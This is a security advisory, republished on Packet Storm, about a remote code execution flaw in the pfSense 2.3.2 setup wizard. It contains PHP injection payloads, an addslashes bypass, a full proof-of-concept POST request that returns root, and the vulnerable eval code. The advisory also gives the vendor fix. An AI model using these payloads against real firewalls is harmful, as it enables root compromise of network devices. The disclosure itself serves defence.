what you don't know can hurt you

pfsense 2.3.2 Code Execution

pfsense 2.3.2 Code Execution
Posted Mar 27, 2017
Authored by Tim Coen | Site curesec.com

pfsense version 2.3.2 suffers from a remote code execution vulnerability.

tags | exploit, remote, code execution
MD5 | 4398de06e73854df8caec492ca62f7a5

pfsense 2.3.2 Code Execution

Change Mirror Download
Security Advisory - Curesec Research Team

1. Introduction

Affected Product: pfsense 2.3.2
Fixed in: 2.3.3
Fixed Version Link: https://pfsense.org/download/
Vendor Website: https://www.pfsense.org/
Vulnerability Type: Code Execution
Remote Exploitable: Yes
Reported to vendor: 02/06/2017
Disclosed to public: 03/24/2017
Release mode: Coordinated Release
CVE: requested via DWF
Credits Tim Coen of Curesec GmbH

2. Overview

pfsense is an open source firewall. The web interface is written in PHP. In
version 2.3.2-RELEASE (amd64), the setup wizard is vulnerable to code
execution.

It should be noted that by default, only an administrator can access the setup
wizard. By default, administrators have far-reaching permissions via the wizard
and via other functionality. There are however some custom configurations where
this vulnerability could lead to privilege escalation or undesired code
execution.

Unknown to us, this issue was previously discussed on the github page of
opnsense - a fork of pfsense - , although it was not classified as a
vulnerability.

3. Details

CVSS: Medium; 6.8 https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:A/AC:L/
PR:H/UI:N/S:U/C:H/I:H/A:H

When updating a config field, user input is passed to eval. For most config
types the input is sanitized. However, the sanitation can be bypassed and there
is no sanitation for the config type interfaces_selection. Both of these issues
can lead to code execution.

An attacker needs an account with the privilege to use the wizard ("WebCfg -
pfSense wizard subsystem page"). The attack still works even if the privilege
"User - Config - Deny Config Write" is set, which would normally prevent the
user from performing changes on the server or from resetting the admin
password.

To reproduce the issue, visit https://192.168.10.150/wizard.php?xml=
openvpn_wizard.xml, follow the instructions, and at the step that the parameter
"interface" is used, use wan";echo exec("id");" as value.

Note also that the addslashes filter for types other than interfaces_selection
can be bypassed via ${passthru($_GET[x])}.

Proof of Concept:

POST /wizard.php HTTP/1.1 Host: 192.168.10.150 Content-Length: 506 __csrf_magic
=sid%3A57913ee89f117b1d40fec5c590fe10d401717053%2C1450275812&xml=
openvpn_wizard.xml&stepid=9&interface=wan";echo exec("id");"&protocol=TCP&
localport=1194&description=fyjfyfyj&tlsauthentication=on&generatetlskey=on&
dhparameters=2048&crypto=AES-256-CBC&digest=SHA1&engine=none&tunnelnet=&
localnet=&concurrentcon=&compression=&dynip=on&addrpool=on&defaultdomain=&
dnsserver1=&dnserver2=&dnserver3=&dnserver4=&ntpserver1=&ntpserver2=&nbttype=0&
nbtscope=&winsserver1=&winsserver2=&advanced=&next=Next -> uid=0(root) gid=0
(wheel) groups=0(wheel)

Code:

/wizard.php function update_config_field($field, $updatetext, $unset,
$arraynum, $field_type) { [...] if($field_type == "interfaces_selection") {
$var = "\$config{$field_conv}"; $text = "if (isset({$var})) unset({$var});";
$text .= "\$config" . $field_conv . " = \"" . $updatetext . "\";"; eval($text);
return; } [..] $text = "\$config" . $field_conv . " = \"" . addslashes
($updatetext) . "\";"; eval($text); }

4. Solution

To mitigate this issue please upgrade at least to version 2.3.3:

https://pfsense.org/download/

Please note that a newer version might already be available.

5. Report Timeline

02/06/2017 Informed Vendor about Issue
02/07/2017 Vendor confirms + fixes issues in git
02/20/2017 Vendor relases fix + vendor advisory
03/24/2017 Disclosed to public


Blog Reference:
https://www.curesec.com/blog/article/blog/pfsense-232-Code-Execution-199.html

--
blog: https://www.curesec.com/blog
Atom Feed: https://www.curesec.com/blog/feed.xml
RSS Feed: https://www.curesec.com/blog/rss.xml
tweet: https://twitter.com/curesec

Curesec GmbH
Curesec Research Team
Josef-Orlopp-StraAe 54
10365 Berlin, Germany


Login or Register to add favorites

File Archive:

September 2021

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Sep 1st
    14 Files
  • 2
    Sep 2nd
    19 Files
  • 3
    Sep 3rd
    9 Files
  • 4
    Sep 4th
    1 Files
  • 5
    Sep 5th
    2 Files
  • 6
    Sep 6th
    3 Files
  • 7
    Sep 7th
    12 Files
  • 8
    Sep 8th
    22 Files
  • 9
    Sep 9th
    17 Files
  • 10
    Sep 10th
    19 Files
  • 11
    Sep 11th
    3 Files
  • 12
    Sep 12th
    2 Files
  • 13
    Sep 13th
    15 Files
  • 14
    Sep 14th
    16 Files
  • 15
    Sep 15th
    15 Files
  • 16
    Sep 16th
    7 Files
  • 17
    Sep 17th
    13 Files
  • 18
    Sep 18th
    2 Files
  • 19
    Sep 19th
    2 Files
  • 20
    Sep 20th
    14 Files
  • 21
    Sep 21st
    0 Files
  • 22
    Sep 22nd
    0 Files
  • 23
    Sep 23rd
    0 Files
  • 24
    Sep 24th
    0 Files
  • 25
    Sep 25th
    0 Files
  • 26
    Sep 26th
    0 Files
  • 27
    Sep 27th
    0 Files
  • 28
    Sep 28th
    0 Files
  • 29
    Sep 29th
    0 Files
  • 30
    Sep 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2020 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close